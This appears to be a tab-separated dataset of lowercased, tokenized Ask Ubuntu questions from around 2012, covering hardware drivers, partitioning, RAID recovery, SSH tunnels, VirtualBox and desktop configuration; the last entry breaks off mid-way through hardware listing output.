122081	how to restore plymouth default theme	i 'm a newbie and i 've got this issue : my system has set up debian_5 theme but i want to get rid of it and restore the ubuntu 11.10 default grub theme/splash/design ( as you prefer ) that is i think plymouth-theme-ubuntu-logo . i installed/reinstalled it by ubuntu software center , but it did n't anything . [ for your curiosity : the cause of that unwanted theme ( debian 5 ) it 's that i have tried lot of packages and now i ca n't restore the default grub design ( that i liked so much ! ) ]
122082	is triple monitor possible with intel hd 3000 ?	i am considering buying a new pc , with intel hd 3000 . i have 3 monitors , the mb has vga , hdmi and dvi outputs . is it possible to work with 3 monitors in such a system ( with 12.04 or 11.10 ) ? does anyone have any experience to share on this ?
122086	how to fix ipython notebook 0.12 dashboard links	i 've installed ipython 0.12 on a freshly installed machine with ubuntu 12.04 ( precise ) , mainly because i wanted to use the notebook interface . now it turns out that all the links in the python dashboard are broken . if i click on them , i get a url that looks like : localhost:8089/undefined < some code , e.g . 3435glk4w5lk4m5 > . if i remove the word `` undefined '' from the url , i can open the files and edit them , but how do i fix this issue ? regards , dirk
122087	how i install blender 2.62_freestyle on ubuntu 11.10 ?	how do i install blender 2.62_freestyle on ubuntu 11.10 . this is a specific build of blender from the graphicall.org website .
122088	partitioning ubuntu to install windows	i need some guidance with partitioning my machine which is running ubuntu 11.10 . i have try using gparted within ubuntu , but i keep getting a root access error . eventually , after a few hours of tinkering , i managed to get gparted to load . the problem now is that when i try to unmount hdd through gparted , in order to partition it , i am unable to do so . help . : (
122091	difference between filesize and size on disk	when checking the properties of my downloads folder i saw that it said total size on files : 5.3gb size on disk : 43.0gb o__o i have noticed this in windows , but i 've been too lazy to inquire further because the difference was only a few percentage . is this because of the different file system that linux uses ? is this normal ?
122093	how do i compile a wikipedia lens and install ?	i read a tutorial about how to compile and install a wikipedia lens , but it did n't work . the tutorial sounds easy - i just copied and pasted to the file that was suppose to edit . i have tried some times and here are 2 edits edit 1 : import logging import optparse import gettext from gettext import gettext as _ gettext.textdomain ( 'wikipedia ' ) from singlet.lens import singlescopelens , iconviewcategory , listviewcategory from wikipedia import wikipediaconfig import urllib2 import simplejson class wikipedialens ( singlescopelens ) : wiki = `` http : //en.wikipedia.org '' def wikipedia_query ( self , search ) : try : search = search.replace ( `` `` , `` | '' ) url = ( `` % s/w/api.php ? action=opensearch & limit=25 & format=json & search= % s '' % ( self.wiki , search ) ) results = simplejson.loads ( urllib2.urlopen ( url ) .read ( ) ) print `` searching wikipedia '' return results [ 1 ] except ( ioerror , keyerror , urllib2.urlerror , urllib2.httperror , simplejson.jsondecodeerror ) : print `` error : unable to search wikipedia '' return [ ] class meta : name = 'wikipedia' description = 'wikipedia lens' search_hint = 'search wikipedia' icon = 'wikipedia.svg' search_on_blank=true # todo : add your categories articles_category = listviewcategory ( `` articles '' , `` dialog-information-symbolic '' ) def search ( self , search , results ) : for article in self.wikipedia_query ( search ) : results.append ( `` % s/wiki/ % s '' % ( self.wiki , article ) , `` http : //upload.wikimedia.org/wikipedia/commons/6/63/wikipedia-logo.png '' , self.articles_category , `` text/html '' , article , `` wikipedia article '' , `` % s/wiki/ % s '' % ( self.wiki , article ) ) pass edit 2 : import urllib2 import simplejson import logging import optparse import gettext from gettext import gettext as _ gettext.textdomain ( 'wikipediaa ' ) from singlet.lens import singlescopelens , iconviewcategory , listviewcategory from wikipediaa import wikipediaaconfig class wikipediaalens ( singlescopelens ) : wiki = `` http : //en.wikipedia.org '' def wikipedia_query ( self , search ) : try : search = search.replace ( `` `` , `` | '' ) url = ( `` % s/w/api.php ? action=opensearch & limit=25 & format=json & search= % s '' % ( self.wiki , search ) ) results = simplejson.loads ( urllib2.urlopen ( url ) .read ( ) ) print `` searching wikipedia '' return results [ 1 ] except ( ioerror , keyerror , urllib2.urlerror , urllib2.httperror , simplejson.jsondecodeerror ) : print `` error : unable to search wikipedia '' return [ ] def search ( self , search , results ) : for article in self.wikipedia_query ( search ) : results.append ( `` % s/wiki/ % s '' % ( self.wiki , article ) , `` http : //upload.wikimedia.org/wikipedia/commons/6/63/wikipedia-logo.png '' , self.articles_category , `` text/html '' , article , `` wikipedia article '' , `` % s/wiki/ % s '' % ( self.wiki , article ) ) pass class meta : name = 'wikipedia' description = 'wikipedia lens' search_hint = 'search wikipedia' icon = 'wikipedia.svg' search_on_blank=true # todo : add your categories articles_category = listviewcategory ( `` articles '' , `` dialog-information-symbolic '' ) def search ( self , search , results ) : # todo : add your search results results.append ( 'https : //wiki.ubuntu.com/unity/lenses/singlet ' , 'ubuntu-logo ' , self.example_category , `` text/html '' , 'learn more ' , 'find out how to write your unity lens ' , 'https : //wiki.ubuntu.com/unity/lenses/singlet ' ) pass so .. what can i change in the edit ? ( if anybody give me the entire edit file edited i will appreciate )
122094	best way to upgrade to 12.04	when 12.04 hits on the 26th , what is the best way to upgrade from 11.10 ( or any version ) ? should i download an iso and install from cd or upgrade from the update manager ? what are the advantages of either ? keep in mind i want to keep everything : my packages , my settings , documents , custom file system configurations , etc . also , should i wait until the 26th , or can i go ahead and upgrade to the beta and then upgrade the beta on the 26th ?
122105	how do i locate and remove broken packages that i have installed ?	i was browsing some questions here to find a solution to locating and removing broken packages . being a relative novice i installed some ppas designed for 11.10 on my 12.04 lts machine . in terminal it suggested i try apt-get -f install which brought me to this question a big lesson learned for me , if anyone can help
122113	copy to usb memory stick really slow ?	when i copy files to the usb device , it takes much longer than in windows ( same usb device , same port ) it 's faster than usb 1.0 speeds ( 1mb/s ) but much slower than usb 2.0 speeds ( 12mb/s ) . to copy 1.8gb takes me over 10 minutes ( it should be < 3 min . ) i have two identical sandisk cruzer 8gb sticks , and i have the same problem with both . i have a super talent 32gb usb ssd in the neighboring port and it works at expected speeds . the problem i seem to see in the gui is that the progress bar goes to 90 % almost instantly , completes to 100 % a little slower and then hangs there for 10 minutes . interrupting the copy at this point seems to result in corruption at the tail end of the file . if i wait for it to complete the copy is successful . any ideas ? dmesg output below : [ 64059.432309 ] usb 2-1.2 : new high-speed usb device number 5 using ehci_hcd [ 64059.526419 ] scsi8 : usb-storage 2-1.2:1.0 [ 64060.529071 ] scsi 8:0:0:0 : direct-access sandisk cruzer 1.14 pq : 0 ansi : 2 [ 64060.530834 ] sd 8:0:0:0 : attached scsi generic sg4 type 0 [ 64060.531925 ] sd 8:0:0:0 : [ sdd ] 15633408 512-byte logical blocks : ( 8.00 gb/7.45 gib ) [ 64060.533419 ] sd 8:0:0:0 : [ sdd ] write protect is off [ 64060.533428 ] sd 8:0:0:0 : [ sdd ] mode sense : 03 00 00 00 [ 64060.534319 ] sd 8:0:0:0 : [ sdd ] no caching mode page present [ 64060.534327 ] sd 8:0:0:0 : [ sdd ] assuming drive cache : write through [ 64060.537988 ] sd 8:0:0:0 : [ sdd ] no caching mode page present [ 64060.537995 ] sd 8:0:0:0 : [ sdd ] assuming drive cache : write through [ 64060.541290 ] sdd : sdd1 [ 64060.544617 ] sd 8:0:0:0 : [ sdd ] no caching mode page present [ 64060.544619 ] sd 8:0:0:0 : [ sdd ] assuming drive cache : write through [ 64060.544621 ] sd 8:0:0:0 : [ sdd ] attached scsi removable disk
122115	startup application command flags ?	i 'm trying to add an application for startup that runs a program with a flag . i entered xpad -h and xpad -- h into the command line . xpad is a sticky note application , and the -h flag tells it to hide the windows but still keep an indicator open . whenever i login , my computer will open xpad but wo n't hide the windows , which i believe means that the flag is ignored . am i doing something wrong ?
122116	how do i make my webpage accessible from the internet ?	situation : i have apache2 server with linux ubuntu os 11.10 . then i install a php5 , myadmin , dns server , lamp server , my sql server . this is what i have done : check localhost 127.0.0.1 and it works ! edit index.html default webpage located in /var/www change my ip address to static restart /etc/init.d/apache2 restart { ok } bought a domain name turn off firewall on my router now i need your help ! please tell me how and what needs to be done that other people around the world can type my domain name and connect to my server and default web page index.html located in /var/www ? i do not care about security . i changed permission on /var/www/ to 777 for the moment , because i want to host my simple website or webpage but only on my local server . thank you this is my first server and i guess you got the point . if possible step by step .
122119	my ati radeon x1200 graphic card is not installed how do i install it	i am new to ubuntu i have a toshiba satellite a215 laptop with a ati radeon x1200 graphic card . when ubuntu 12.04 has finished installed , i check the detail menu in system settings the graphic option is displaying , driver known experience standard . i 'm then assuming that the graphic card is not installed how can i install it if thats the case .
122121	how to set up a wacom cintiq 24 hd ?	i 'm new to ubuntu and the linux world ( switched from mac to linux ) and i have a problem : i 'm studyin industrial-design and a lot of my work depends on my wacom cintiq 24 hd . my problem is that ubuntu does n't find my cintiq . i googled for wacom drivers and found the linux wacom project . the problem for me is that i hardly understand anything of what i have to do ... is there anyone who can tell me how i can set up my 24hd or is there an easy way for people who are new to linux like me . i really really like linux and want to stay with it but that is n't possible for me without my cintiq . i would be very greatefull for any help !
122125	how to rename and move files according to directory names ?	i have bunch of directories containing the file with the same name . i want to move these files to another directory and at the same time renaming them with the directory name so that they are distinguished and are not over-written . edit : all the directories are in the same directory . destination is one directory on the system which could be anything . we read directory and read file form it and rename it exactly as the directory name and put it to the destination . an important constraint is that the name of the file is given which will be in all of the directories . directories might contain other files bit also the one which is given thanks a lot
122127	can i resolve user issues by cleaning out my home folder ?	yesterday i had an issue with my 12.04 - http : //askubuntu.com/questions/121957/12-04-does-anyone-know-how-to-fix-this-all-of-a-sudden-my-terminal-shortcut-d # comment145297_121957 and some configuration causing an issue with metacity making it crash - i was walked through the problem , and found out that by creating another user account and logging onto it - the problem was n't present anymore on that account but still was present on my old account . so my question is - was the problem just something in my old home folder ? - also - can most issues that occur like this be solved by making a new account and backing up the `` home '' folder ?
122129	switching to an external display , when primary is broken	i 've successfully install ubuntu 11.10 desktop ( x86 ) on an old ( er ) laptop that unfortunately has a broken screen , so there is an external monitor plugged in . on the livecd it come up on the secondary display just fine and i was able to install ubuntu and everything . unfortunately when i reboot into ubuntu proper now , the secondary display is off and i 'm literally driving blind here trying to switch it to the secondary display . using nvidia open source drivers . things i 've tried : rebooting back into livecd , mounting the partition and trying in vain to find a config file ( it uses the open source drivers so no xorg.conf i could edit manually ) trying to blind-type xrandr settings into what i hope is terminal : xrandr -- output vga1 -- auto ( nothing happened ) trying to blind install openssh-server so i could ssh into it and maybe configure it from my working computer . for some reason though , no luck . ubuntu really should default to expanding to all screens for this use case .
122133	'tools.jar ' is not in idea classpath	i am a new user of linux , it has been recommended to me by my friend . he told me to install software called intellij idea ide . well i have been following the tutorial . but now when i try to open `` idea.sh '' , an error message pops-up : 'tools.jar ' is not in idea classpath . please ensure java_home points to jdk rather than jre . please remember that i 'm new to ubuntu and i 'm planning for a nice long stay once i get myself into it : ) also i do not know if i am running a correct java6 jdk . when i do java -version , this is what i get : java version `` 1.6.0_23 '' openjdk runtime environment ( icedtea6 1.11pre ) ( 6b23~pre10-0ubuntu5 ) openjdk 64-bit server vm ( build 20.0-b11 , mixed mode ) thank you for reading this and i hope i will get a nice response .
122135	password help please	i have version 11.10 and am having trouble login in can only access guest account and can not get into adminastrator account . i have gone to root menu and tried to enter password change it posts authentication token manipulation error password unchanged . what can i do to get back adminastration account ?
122141	what 's the difference between .tar.gz and .gz , or .tar.7z and .7z ?	recently , i 've been backing up a lot of my data , and i noticed that i can save files as .gz or .tar.gz , or .7z and .tar.7z , etcetera . what are the differences between the normal one and the .tar . * variant ? which one of them is adviced when making backups ?
122142	scope-contacts-google and unity-scope-spotify is missing packages which wo n't be installed	when i try to install scope-contacts-google and unity-scope-spotify , it says that is misses gir1.2-dee-0.5 for google gir1.2-unity-4.0 and gir1.2-dee-0.5 for spotify . when i try to install these missing packages , it tells me i have a newer version installed . what 's wrong , and what do i do ?
122147	need to convert a video file from mp4 to xvid	i checked out the questions with similar titles and did n't find anything that i thought would help . i am attempting to convert a video into an avi , preferably xvid . the video file 's video and audio properties are as follows : video dimensions : 1280x544 codec h.264/avc framerate : 24 frames per second bitrate : 774 kpbs audio codec : mpeg-4 aac audio channels : stereo sample rate : 48000 hz bitrate : 32 kpbs i have tried numerous times to convert this into an xvid codec avi but i have had no luck successfully getting the audio to sync properly . i am using openshot to attempt conversion , using the libxvid codec and avi format , but i am unsure of the proper audio settings i should use . what settings should i use to convert this video with openshot ? if it is not possible with openshot , or if there is a better application to use , i would be grateful to know that as well .
122148	flash in browsers does not play sound accurately using pulse network audio	i use pulseaudio to send sound over the lan to an audio server . when playing any flash media in firefox or chrome , the sound flutters ( example ) , as if the volume were going up and down every second . i have discovered that i can stop the sound fluttering if i follow these steps : start a flash video , such as a video on youtube run pulseaudio -- kill on the server wait about 7 seconds after this , the pulseaudio server automatically respawns , and the sound in the flash video is fine . the problem is that i have to do this every time i start a flash video . this is obviously not desireable . how do i make whatever it is that makes the sound work when i go through these steps stick so that i do n't have to do them ? i doubt that someone will come up with an immediate and simple fix ( though that would be nice ) , so the bounty could go to anyone who provides at least a method of diagonosing the problem . details here are my sound device output settings . as far as i can tell , all four devices point to the exact same physical device . pulseaudio log output , taken while attempting to play a flash video . i 've tried to get logging details from flash , but despite installing and enabling flash for debugging , it has not generated any ouput at all . the problem does not exhibit with any other software , so i am reasonably certain it 's specific to how flash interacts with my sound set up . here is some error output that might be helpful : $ cat /var/log/syslog | grep pulseaudio jul 30 01:40:08 mythbuntu pulseaudio [ 17388 ] : [ pulseaudio ] module.c : failed to open module `` module-esound-protocol-tcp '' : file not found jul 30 01:40:08 mythbuntu pulseaudio [ 17388 ] : [ pulseaudio ] module-gconf.c : pa_module_load ( ) failed jul 30 01:40:08 mythbuntu pulseaudio [ 17388 ] : [ pulseaudio ] module.c : module-combine is deprecated : please use module-combine-sink instead of module-combine ! jul 30 01:40:08 mythbuntu pulseaudio [ 17388 ] : [ pulseaudio ] module-combine.c : we will now load module-combine-sink . please make sure to remove module-combine from your configuration . jul 30 01:55:07 mythbuntu pulseaudio [ 17406 ] : [ pulseaudio ] module.c : failed to open module `` module-esound-protocol-tcp '' : file not found jul 30 01:55:07 mythbuntu pulseaudio [ 17406 ] : [ pulseaudio ] module-gconf.c : pa_module_load ( ) failed jul 30 01:55:07 mythbuntu pulseaudio [ 17406 ] : [ pulseaudio ] module.c : module-combine is deprecated : please use module-combine-sink instead of module-combine ! jul 30 01:55:07 mythbuntu pulseaudio [ 17406 ] : [ pulseaudio ] module-combine.c : we will now load module-combine-sink . please make sure to remove module-combine from your configuration . jul 30 02:04:43 mythbuntu pulseaudio [ 17433 ] : [ pulseaudio ] module.c : failed to open module `` module-esound-protocol-tcp '' : file not found jul 30 02:04:43 mythbuntu pulseaudio [ 17433 ] : [ pulseaudio ] module-gconf.c : pa_module_load ( ) failed jul 30 02:04:43 mythbuntu pulseaudio [ 17433 ] : [ pulseaudio ] module.c : module-combine is deprecated : please use module-combine-sink instead of module-combine ! jul 30 02:04:43 mythbuntu pulseaudio [ 17433 ] : [ pulseaudio ] module-combine.c : we will now load module-combine-sink . please make sure to remove module-combine from your configuration . here is the output from pactl list from the server ( computer with speakers ) . here is the output from pactl list from the client .
122153	open irc : // links in xchat from firefox/chrome on 11.10	i tried following the tips here : open irc : // links in xchat from firefox and chromium but none of them worked on 11.10 . i want to be able to click irc : // links on a browser and launch xchat with the server/channel specified in the link . most of them just open xchat but do not automatically connect . is there a specific way to do it with 11.10 ? i did the script one , the gconfig one ... none of them worked . i 'm a beginner using ubuntu and linux , and am of course using unity .
122154	reliable way to create secure tunnels from startup on an ubuntu laptop ?	i 'm looking for a reliable way to start a secure tunnel at boot on a laptop . this tunnel will not be needed by other parts of the boot process , but could be needed at any subsequent time by a user . it should `` just work '' , the user should not have to monitor and fix it . the secure tunnel will `` pull in a port '' from a insecure application bound to localhost ( in this case , a redis database ) on a remote server to the ubuntu laptop . example : remote server : example.net remote port to forward : 6379 , bound only to localhost from example.net remote user : mole @ example.net keyfile : mole @ example.net has authorized a ssh keypair with no passphrase , one key is stored in authorized_keys on the server and the other in /root/molekey.rsa on the laptop this works inside a terminal window on the laptop : $ sudo su ... # ssh -i /root/molekey.rsa -l 16379 : localhost:6379 mole @ example.net -n & # exit $ telnet localhost 16379 ( works fine ) ^c so then i tried putting ssh -i /root/molekey.rsa -l 16379 : localhost:6379 mole @ example.net -n & into /etc/rc.local but that does n't work reliably , the ssh process was gone when the tunnel was needed and i ca n't find any error lines for it in syslog or messages is there a more reliable way to start the secure tunnel at boot-up , or perhaps a manager that will restart the secure tunnel as needed ?
122155	windows broke my md raid . ( unknown raid level -1000000 )	i did something very stupid today . now i 'm just hoping to find someone who is even more smart than i am stupid . i have a couple of hot swappable disks . since i 'm going to screencast ubuntu 12.04lts next week , i thought i 'd install a fresh copy on an empty disk . i thought i 'd see if i could do that using virtualbox , so that i could just reboot the host to that disk when it was finished and setup completely . so i created a vmdk that pointed to that disk with raw access . worked great . then i thought , i might as well test with windows first , because that would allow me to screencast how to install ubuntu from a running windows machine . install went fine . i then rebooted to it , but windows crashed . i were n't too surprised by that , though . i did n't really expect that to work in the first place . but it asked if it should fix the startup problems for me . yes please . it told me everything was now fine , and i could reboot . windows still did n't boot , so i gave up on that project and rebooted to ubuntu . unknown raid level -1000000 , grub says now . i ca n't boot from my main disks . but i have ubuntu on my keyring of course , so i booted from that . installed mdadm and run mdadm -- assemble -- scan . it then tells me ubuntu @ ubuntu : ~ $ sudo mdadm -- assemble -- scan mdadm : devices uuid-00000000:00000000:00000000:00000000 and uuid-c00b1e54:78802534 : df92b1b7:9e64ccd8 have the same name : /dev/md1 mdadm : duplicate md device names in conf file were found . that 's worse ; i ca n't activate the raid . this is 1.8tb of data , so i really would rather not restore from backup . as you can imagine , all inputs are valuable to me now . more information about the setup . i have three disks 1.5tb each . the first partition on all of them is a raid 1 . this is used for boot . they also have a second partition which is used for a raid5 . this raid5 is used for lvm . now , palimpsest detects the partitions properly . so i 'm not in total despair yet . it seems unlikely that windows will have damaged the second partition , hundreds of megabytes into the disk ? my assumption is that it 's only damaged something at the beginning . then the question becomes how do i fix it ? i 've also run ubuntu @ ubuntu : ~ $ sudo mdadm -- examine -- scan array /dev/md1 uuid=00000000:00000000:00000000:00000000 spares=2 array /dev/md0 uuid=37bc1971:5b00e915:2f3fc100:0972a2ae array /dev/md1 uuid=c00b1e54:78802534 : df92b1b7:9e64ccd8 it does n't look entirely hopeless , but i 'm a little bit stuck . geniuses , where are you ! : )
122156	cdrom mounting issues	this is my very first boot on ubuntu and i noticed the system did not open , pop up anything when i inserted a dvd . researched a bit about and it seems ubuntu does n't mount cd drives automatically , is that true or just for my case ? i tried some terminal commands and got the cd to mount . is there a way it will behave like windows , and be there for me when i need it , with no need to play with terminal ? thanks for any help . -- mezo
122161	alt tab with xdotool and xkeybind	i 'm trying to map alt tab behavior to a mouse button using xdotool in my .xbindkeysrc . what i want to do is map something like '' xdotools keydown alt key tab '' release b:7 but by doing this the alt key gets stuck , and it prevents my other mappings from working until i press the alt key on the keyboard . is there a way to do this without having to press the alt key to get things unstuck ? without keydown it just switches back and forth between two windows , with keydown it behaves like i want ( displaying the alt-tab switcher ) but the alt key is stuck . is there a way to unstick the key after using the alt tab switcher using xdotools ?
122165	10.10 irritating updater message	as you all know 10.10 support has ended . thus whenever i start the update manager i get a dialog box saying your ubuntu release is not supported anymore you will not get any further security fixes or critical updates . please upgrade to a later version of ubuntu linux . any way to remove this ? that is really bugging me . ps . updating to a newer version is not an option now the screenshot
122174	how better to adjust more than 2 keyboard layouts	from time to time i have to use characters not present in my two layouts : latin and cyrillic and instead of digging in character map i thought to add 2 additional keyboard layouts . my issue with this approach is that most of the time i use just two layouts , and while changing to different layout ( alt+shift ) i now have to press couple of times to switch to previous layout . it 's not just number of pressings , but i have to press two keys at once and track keyboard indicator which is distracting . i tried some options presented in keyboard settings , but i think there is no option that i would like - change just between first two layouts on alt+shift , and if i want to use additional layout i can choose it from keyboard indicator drop-down menu . any ideas how this might be possible ?
122178	shotwell issues in 11.10	i had used shotwell happily previously then updated to natty last week . despite shotwell showing on the tool bar on screen , when clicked , nothing happened , and it ignored my sd card when loaded . i read all sorts of remedies and tried everything to no avail . when i next turned on the laptop , ocelot was available so with nothing to loose , i upgraded again . still no shotwell . tried all the new fixes and now atleast i have the icon pictures but nothing behind it . when i ran the command to load the log file , shotwell loaded and all my photos are present . exited programme , and now nothing . can anyone tell me where i have gone wrong please .
122183	why do software patches have to be accepted by a developer ?	in open source projects , why do software patches have to be accepted by a developer ? could n't contributors just release their own patches and allow people to add the patch if they choose to . i 'm wondering why there are so many ubuntu programs that could use such obvious work but are n't updated . for instance , lots of people want rhythmbox to be more attractive . why ca n't the people who design themes on deviantart turn those into code and let users download those themes themselves , even if the developers at rhythmbox wo n't accept different themes ?
122186	what 's the most appropriate ubuntu list for feeding back on user issues ?	background : i 'm a retired computer guy , have played with linux since 1993 , been out of the loop for awhile , but recently re-committed to ubuntu and am looking to get involved a bit in its development and growth . i just upgraded to 12.04 beta2 and have identified a few ... glitches and issues in the process , from a simple end-user perspective . there seems to more than one list that might fit , in the ubuntu-devel- or perhaps ubuntu-qa- or even ubuntu-desktop- hierarchies . ( i 've also found places like brainstorm and bugsquad . ) comments and suggestions ? : ) cheers , alec .
122190	brightness keys adjust brightness too many times	every time i hit a brightness key on my laptop 's keyboard , it adjusts the brightness by three steps instead of one . how can i fix it so that it only adjusts one step at a time ? i am using an acer aspire d250 with the newest firmware . it was working better when i was using ubuntu 10.10 with older firmware ( although the scale was off ) . any tips on debugging this would be appreciated . edit : my graphics : 00:02.0 vga compatible controller : intel corporation mobile 945gme express integrated graphics controller ( rev 03 ) /sys/class/backlight $ ls acpi_video0 intel_backlight
122191	live usb wo n't boot properly on asus eee pc 1201hab	for some reason , i never get an x session going . i see a bunch of startup text messages , then it just stops . i checked the xorg.0.log and it looks like there 's some issue with the vesa driver ? i tried the 'nomodeset ' boot option , that did n't help . any help would be greatly appreciated . trying to manually `` startx '' results in these errors : vesa : ignoring device with a bound kernel driver ( ee ) open /dev/fb0 : no such file or directory ( ee ) screen ( s ) found , but none have a usable configuration . output of lspci | grep -i vga : 00:02.0 vga compatible controller : intel corporation system controller hub ( sch poulsbo ) graphics controller ( rev 07 ) i heard this error has something to do with linux kernel 3.0 and something about a kernel-based video driver ?
122192	ubuntu 11.10 on macbook pro 4,1 - fails during installation	i have a macbook pro 4,1 it has a 64 bit intel chipset . i download ubuntu-11.10-amd-64.iso i have verified that macbook iso md5sum and the cd boots to the live cd mode too . the installation completes upto 60 % and then fails with the following dialog . i am not sure if this a problem with cd has i have tried a couple of times and it has failed with a different cd at a different point in time .
122196	why is n't dockbarx in the official repositories ?	why is n't dockbarx in the official repositories ? ( i am aware of the existence of ppas . )
122197	automatically locking screen without shutting it off	hey everyoneâ i have a home theater pc running ubuntu 11.10 , outputting over hdmi ( for audio and video ) . i 'm having an issue : i 'd like the screen to lock automatically ( when video is not playing , of course ) but do not want the screen to turn off automatically , because that kills audio . i can manually lock the screen , of course , but it appears that if you set the `` turn off screen '' setting to `` never '' , the screen will never lock , no matter what the `` lock screen '' timeout is set to . is there a way to do what i 'm asking , or will i have to install xscreensaver ?
122199	increase size of / and /home	hi i have a 20 gb partition for / and 14 gb for /home . i want to shrink c : / to 20 gb and add each 10 gb to / and /home . but i can not do this as if i shrink c drive , the unallocated 20 gb is can not be added to either / or /home . for more info i am telling that 4 drives are extended partition and the rest is primary . so how to extend this partition ? screenshot of windows 7 disk management - http : //img12.imageshack.us/img12/5977/snap1sv.jpg
122209	how do i modify or disable the hud 's use of the alt key ?	a number of games , emacs , and the terminal make extensive use of the alt key . can unity be configured to respect this key , rather than launching the hud with it ?
122211	getting error message when trying to start a virtual machine	i have been using vmware on windows for a long time . but after a long wait , i moved to virtualbox on ubuntu 11.10 . i installed ubuntu , 32 bit , installed all available updates and installed virtual box . when i try to create a new windows installation inside virtualbox , i got the following error messages . virtualbox - error failed to open a session for the virtual machine windows xp . the virtual machine '**windows xp** ' has terminated unexpectedly during startup with exit code 1 . details result code : ns_error_failure ( 0x80004005 ) component : machine interface : imachine { 5eaa9319-62fc-4b0a-843c-0cb1940f8a91 } 2nd error dialogue virtualbox - error in suplibosinit kernal driver not installed ( rc -- 1908 ) please install the virtualbox-dkmbs package and execute 'modprobe vboxdrv ' as root . i have already tried reinstalling virtualbox . google result seem to indicate the the problem happens due to kernel updates . is there anyway i can get this working ? i need this for malware analysis and if virtualbox is going to crash on me all the time , then i wo n't be able to use ubuntu for work . output to dpkg -l | grep virtual server rc virtualbox 4.1.2-dfsg-1ubuntu1 x86 virtualization solution - base binaries rc virtualbox-qt 4.1.2-dfsg-1ubuntu1 x86 virtualization solution - qt based user interface cute 'modprobe vboxdrv ' as root. < p >
122215	regarding partition and installation	i am currently using windows xp on my compaq pressario v3000 laptop . i would like to remove windows and install/use ubuntu . do i have to format all the partitions ( ntfs ) or the one on which windows is installed . kindly help .
122218	ca n't start cpan shell	when attempting to run cpan i get : ca n't use an undefined value as a symbol reference at /usr/share/perl/5.12/cpan.pm line 508 . what could be the problem ?
122222	blank screen on boot in dell vostro 3750	i have been using ubuntu in my acer aspire 5920 and aspire 1 since last many years . recently i purchased dell vostro 3750 - intel® core™ i7-2670qm with nvidia® geforce™ gt 525m , 1gb ( quad core ) i tried installing ubuntu 11.10 and 12.04 beta . i an able to use both from live cd without any problem . but when i install it , only a blank screen appears after the boot menu . i tried changing quiet splast to nomodeset and no splast . did n't work . i am totally stuck here .
122226	microphone not working on lenovo g470	i used a lenovo g470 laptop ( core i5 2410m processor , amd radeon 6370m and 2gb ddr3 ram ) and i installed ubuntu 12.04 . i ca n't get the microphone to work . i encountered this type of issue before in my old acer aspire one with ubuntu 10.04/10.10 , and installing pulseaudio volume control and tweaking a little solves the problem . i tried the same solution to no avail in 12.04 . i tried entering the alsa in terminal and my mic is not detected there . does anybody encountered a similar problem ? any help will be greatly appreciated .
122227	usb wifi dongle on ubuntu server , can not install realtek driver rtl 8188cus	i got cheap ebay wifi dongle from hongkong , im trying to set it up on my ubuntu server . occasionally need to move server , so it can not always be connected to router via lan . anyhow , usb wifi came with a driver cd . i uploaded files to my home directory and tried to run install script ( rtl 8188cus ) : sudo bash install.sh but i get error : authentication requested [ root ] for make driver : make arch=x86_64 cross_compile= -c /lib/modules/2.6.38-8-server/build m=/home/minime/rtl 8188cus/linux/driver/rtl8192cu_linux_v2.0.1324.20110126 modules make [ 1 ] : entering directory `/usr/src/linux-headers-2.6.38-8-server' make [ 1 ] : *** no rule to make target `8188cus/linux/driver/rtl8192cu_linux_v2.0.1324.20110126 ' . stop . make [ 1 ] : leaving directory `/usr/src/linux-headers-2.6.38-8-server' make : *** [ modules ] error 2 compile make driver error : 2 , please check error mesg any ideas what im doing wrong ? there is another driver folder for linux called : rtl 81xx , which does n't have install.sh at all ! i tried to use make command , but i get : make : *** no targets specified and no makefile found . stop . any help ? this is first time i 'm installing driver from source . im on ubuntu 11.04 server . lsusb bus 001 device 002 : id 0bda:8176 realtek semiconductor corp. lspci -nn 00:00.0 host bridge [ 0600 ] : intel corporation n10 family dmi bridge [ 8086 : a000 ] ( rev 02 ) 00:02.0 vga compatible controller [ 0300 ] : intel corporation n10 family integrated graphics controller [ 8086 : a001 ] ( rev 02 ) 00:1b.0 audio device [ 0403 ] : intel corporation n10/ich 7 family high definition audio controller [ 8086:27d8 ] ( rev 02 ) 00:1c.0 pci bridge [ 0604 ] : intel corporation n10/ich 7 family pci express port 1 [ 8086:27d0 ] ( rev 02 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation n10/ich 7 family usb uhci controller # 1 [ 8086:27c8 ] ( rev 02 ) 00:1d.1 usb controller [ 0c03 ] : intel corporation n10/ich 7 family usb uhci controller # 2 [ 8086:27c9 ] ( rev 02 ) 00:1d.2 usb controller [ 0c03 ] : intel corporation n10/ich 7 family usb uhci controller # 3 [ 8086:27ca ] ( rev 02 ) 00:1d.3 usb controller [ 0c03 ] : intel corporation n10/ich 7 family usb uhci controller # 4 [ 8086:27cb ] ( rev 02 ) 00:1d.7 usb controller [ 0c03 ] : intel corporation n10/ich 7 family usb2 ehci controller [ 8086:27cc ] ( rev 02 ) 00:1e.0 pci bridge [ 0604 ] : intel corporation 82801 mobile pci bridge [ 8086:2448 ] ( rev e2 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation nm10 family lpc controller [ 8086:27bc ] ( rev 02 ) 00:1f.2 ide interface [ 0101 ] : intel corporation n10/ich7 family sata ide controller [ 8086:27c0 ] ( rev 02 ) 00:1f.3 smbus [ 0c05 ] : intel corporation n10/ich 7 family smbus controller [ 8086:27da ] ( rev 02 ) 01:00.0 ethernet controller [ 0200 ] : atheros communications device [ 1969:1083 ] ( rev c0 ) sudo lshw description : desktop computer product : to be filled by o.e.m . ( to be filled by o.e.m . ) vendor : to be filled by o.e.m . version : to be filled by o.e.m . serial : to be filled by o.e.m . width : 64 bits capabilities : smbios-2.6 dmi-2.6 vsyscall64 vsyscall32 configuration : boot=normal chassis=desktop family=to be filled by o.e.m . sku=to be filled by o.e.m . uuid=00020003-0004-0005-0006-000700080009 *-core description : motherboard product : ad525pv3 vendor : asrock physical id : 0 *-firmware description : bios vendor : american megatrends inc. physical id : 0 version : p1.20 date : 04/01/2011 size : 64kib capacity : 448kib capabilities : pci upgrade shadowing cdboot bootselect socketedrom edd int13floppy1200 int13floppy720 int13floppy2880 int5printscreen int9keyboard int14serial int17printer int10video acpi usb ls120boot zipboot biosbootspecification netboot *-cpu description : cpu product : intel ( r ) atom ( tm ) cpu d525 @ 1.80ghz vendor : intel corp. physical id : 4 bus info : cpu @ 0 version : intel ( r ) atom ( tm ) cpu d525 @ 1.80ghz serial : to be filled by o.e.m . slot : cpusocket size : 1800mhz capacity : 1800mhz width : 64 bits clock : 200mhz capabilities : x86-64 fpu fpu_exception wp vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse 